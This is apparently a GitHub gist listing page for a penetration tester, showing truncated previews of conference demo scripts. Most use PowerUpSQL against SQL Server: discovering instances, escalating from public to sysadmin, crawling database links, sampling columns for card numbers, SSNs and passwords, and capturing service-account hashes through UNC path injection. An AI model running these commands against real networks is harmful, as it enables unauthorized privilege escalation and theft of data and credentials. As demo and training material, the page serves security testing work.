Scott Sutherland nullbind
nullbind
/ xp_regwrite - allow non sysadmin execution
Last active
February 15, 2021 10:28
SQL Server registry hack that allows non sysadmin logins to use xp_regwrite to access senstive registry locations.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Below is a basic SQL Server registry hack that allows non sysadmin logins to use xp_regwrite to access senstive registry locations. | |
| Scenario | |
| -------- | |
| Give Public role members privileges to execute xp_regwrite. | |
| GRANT EXEC ON OBJECT::master.dbo.xp_regwrite TO [Public] | |
| Issue | |
| ----- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Below are some notes for grabbing a list of domain users and other information via ADFS using acquired credentials. | |
| Install Apps | |
| Download and install visual studio 10 | |
| Downoad and install the Lync SDK | |
| https://www.microsoft.com/en-us/download/details.aspx?id=36824 (deprecated) | |
| http://go.microsoft.com/fwlink/?LinkID=248583 |
nullbind
/ Identify Shared SA Accounts
Created
September 12, 2016 18:34
Testing for shared SA account without knowing the password.
nullbind
/ DerbyCon2016 - SQL Server Discovery Demo
Created
September 25, 2016 13:22
DerbyCon2016 - SQL Server Discovery Demo
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Import the module | |
| Import-Module C:\PowerUpSQL-master\PowerUpSQL.psd1 | |
| # Discover local SQL Server instances | |
| Get-SQLInstanceLocal -Verbose | |
| # Discover SQL Server instances on the domain | |
| Get-SQLInstanceDomain -Verbose | Format-Table -AutoSize | |
| # Discover shared SQL Server service accounts |
nullbind
/ DerbyCon2016 - SQL Server Privilege Escalation Demo - Public to Sysadmin
Last active
September 16, 2019 04:58
DerbyCon2016 - SQL Server Privilege Escalation Demo - Public to Sysadmin
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Import the module | |
| Import-Module C:\PowerUpSQL-master\PowerUpSQL.psd1 | |
| # Discover domain SQL Servers, test access as the current domain user, | |
| # and store a list of SQL Servers that they can log into | |
| $Targets = Get-SQLInstanceDomain -Verbose | | |
| Get-SQLConnectionTestThreaded -Verbose -Threads 10 | | |
| Where-Object {$_.Status -like "Accessible"} |
nullbind
/ DerbyCon2016 - SQL Server Privilege Escalation Demo - Database Links
Last active
June 16, 2020 15:44
DerbyCon2016 - SQL Server Privilege Escalation Demo - Database Links
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Import the module | |
| Import-Module C:\PowerUpSQL-master\scripts\Get-SqlServerLinkCrawl.ps1 | |
| # Crawling Links - this show link paths in output | |
| Get-SqlCrawl -Verbose -Instance MSSQLSRV04.demo.local\SQLSERVER2014 -Export | Export-Clixml C:\PowerUpSQL-master\crawl2.xml | |
| # Crawling Links - this will store link paths in an array so they can be used in differant ways | |
| Get-SqlCrawl -Verbose -Instance MSSQLSRV04.demo.local\SQLSERVER2014 | Export-Clixml C:\PowerUpSQL-master\crawl2.xml | |
| # More Example commands below from Antti Rantasaari |
nullbind
/ DerbyCon2016 - SQL Server Privilege Escalation Demo - Execute as Service Account
Last active
September 16, 2019 04:58
DerbyCon2016 - SQL Server Privilege Escalation Demo - Execute as Service Account
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Determine which SQL Server instances on the domain the current Windows account can log into | |
| # This time we store the discovery information as a variable so we can execute attacks against | |
| # accessible SQL Servers without having to go through discovery against | |
| # Note you can also filter out the "$" character to remove machine service accounts from the list | |
| $Targets = Get-SQLInstanceDomain -Verbose | | |
| Get-SQLConnectionTestThreaded -Verbose -Threads 10 | | |
| Where-Object {$_.Status -like "Accessible"} | |
| # Run operating commands as the service account. | |
| # Note: This requires sysadmin privileges |
nullbind
/ DerbyCon2016 - SQL Server Data Discovery Demo
Last active
September 16, 2019 04:58
DerbyCon2016 - SQL Server Data Discovery Demo
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # One liner for finding potentially sensitive data in accessible databases based on column name | |
| Get-SQLInstanceDomain -Verbose | | |
| Get-SQLColumnSampleDataThreaded –Verbose –Threads 10 –Keyword "credit,ssn,password" –SampleSize 2 –ValidateCC –NoDefaults | | |
| Export-CSV –NoTypeInformation c:\temp\datasample.csv | |
| # Get list of domain sql servers that can be logged into | |
| $Targets = Get-SQLInstanceDomain -Verbose | | |
| Get-SQLConnectionTestThreaded -Verbose -Threads 10 | | |
| Where-Object {$_.Status -like "Accessible"} |
nullbind
/ DerbyCon2016 - SQL Server Privilege Escalation Demo - UNC Path Injection
Created
September 25, 2016 16:06
DerbyCon2016 - SQL Server Privilege Escalation Demo - UNC Path Injection
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Import the PowerUpSQL module | |
| Import-Module C:\PowerUpSQL-master\PowerUpSQL.psd1 | |
| # Import the Inveigh module | |
| Import-Module C:\PowerUpSQL-master\Scripts\3rdparty\Inveigh.ps1 | |
| # Download and import Get-SQLServiceAccountPwHashes.ps1 | |
| # Source: https://github.com/NetSPI/PowerUpSQL/blob/master/scripts/pending/Get-SQLServiceAccountPwHashes.ps1 | |
| Import-Module C:\PowerUpSQL-master\Scripts\Pending\Get-SQLServiceAccountPwHashes.ps1 |
nullbind
/ PowerShell string builder example
Created
October 21, 2016 19:51
PowerShell string builder example
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| source: http://stackoverflow.com/questions/7801651/powershell-and-stringbuilder | |
| Function MyStringFunc([String]$line) { | |
| $r = New-Object -TypeName "System.Collections.Generic.List``1[[System.String]]"; | |
| $sb = New-Object -TypeName "System.Text.StringBuilder"; | |
| foreach ($c in $line) { | |
| [void]$sb.Append($c); | |
| $r.Add($sb.ToString()); | |
| } |